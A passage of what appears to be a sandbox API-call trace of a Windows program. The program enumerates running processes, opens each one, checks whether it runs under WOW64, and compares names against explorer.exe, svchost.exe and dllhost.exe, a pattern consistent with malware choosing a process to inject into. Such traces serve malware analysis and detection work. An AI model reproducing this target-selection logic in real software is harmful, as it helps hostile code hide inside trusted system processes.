th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0187.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0187.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0187.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0187.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0187.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0187.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0187.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0187.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0187.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0187.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0187.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0187.338] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.338] CloseHandle (hObject=0xd8) returned 1 [0187.338] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0187.338] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0187.338] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0187.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0187.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0187.339] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.339] CloseHandle (hObject=0xd8) returned 1 [0187.339] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0187.339] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0187.339] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0187.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0187.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0187.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0187.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0187.341] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.341] CloseHandle (hObject=0xd8) returned 1 [0187.341] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0187.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0187.341] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.341] CloseHandle (hObject=0xd8) returned 1 [0187.342] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0187.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0187.342] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.342] CloseHandle (hObject=0xd8) returned 1 [0187.342] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0187.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0187.343] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.343] CloseHandle (hObject=0xd8) returned 1 [0187.343] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0187.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0187.343] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.343] CloseHandle (hObject=0xd8) returned 1 [0187.343] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0187.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0187.344] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.344] CloseHandle (hObject=0xd8) returned 1 [0187.344] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0187.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0187.344] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.344] CloseHandle (hObject=0xd8) returned 1 [0187.344] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0187.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0187.345] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.345] CloseHandle (hObject=0xd8) returned 1 [0187.345] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0187.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0187.345] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.346] CloseHandle (hObject=0xd8) returned 1 [0187.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0187.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0187.346] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.346] CloseHandle (hObject=0xd8) returned 1 [0187.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0187.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0187.347] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.347] CloseHandle (hObject=0xd8) returned 1 [0187.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0187.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0187.347] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.347] CloseHandle (hObject=0xd8) returned 1 [0187.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0187.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0187.348] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.348] CloseHandle (hObject=0xd8) returned 1 [0187.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0187.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0187.348] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.348] CloseHandle (hObject=0xd8) returned 1 [0187.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0187.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0187.349] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.349] CloseHandle (hObject=0xd8) returned 1 [0187.349] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0187.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0187.350] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.350] CloseHandle (hObject=0xd8) returned 1 [0187.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0187.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0187.350] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.350] CloseHandle (hObject=0xd8) returned 1 [0187.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0187.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0187.351] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.351] CloseHandle (hObject=0xd8) returned 1 [0187.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0187.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0187.351] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.351] CloseHandle (hObject=0xd8) returned 1 [0187.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0187.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0187.352] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.352] CloseHandle (hObject=0xd8) returned 1 [0187.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0187.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0187.352] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.353] CloseHandle (hObject=0xd8) returned 1 [0187.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0187.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0187.354] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0187.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0187.354] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0187.355] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0187.355] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0187.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0187.356] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.356] CloseHandle (hObject=0xd8) returned 1 [0187.356] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0187.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0187.357] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.357] CloseHandle (hObject=0xd8) returned 1 [0187.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0187.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0187.357] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0187.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0187.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0187.358] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.358] CloseHandle (hObject=0xd8) returned 1 [0187.358] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0187.358] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.358] CloseHandle (hObject=0xd8) returned 1 [0187.359] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0187.359] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0187.359] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.359] CloseHandle (hObject=0xd8) returned 1 [0187.359] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.360] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0187.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0187.360] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0187.360] CloseHandle (hObject=0xd8) returned 1 [0187.360] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0187.361] CloseHandle (hObject=0xd4) returned 1 [0187.361] Sleep (dwMilliseconds=0x3e8) [0188.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0188.365] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | 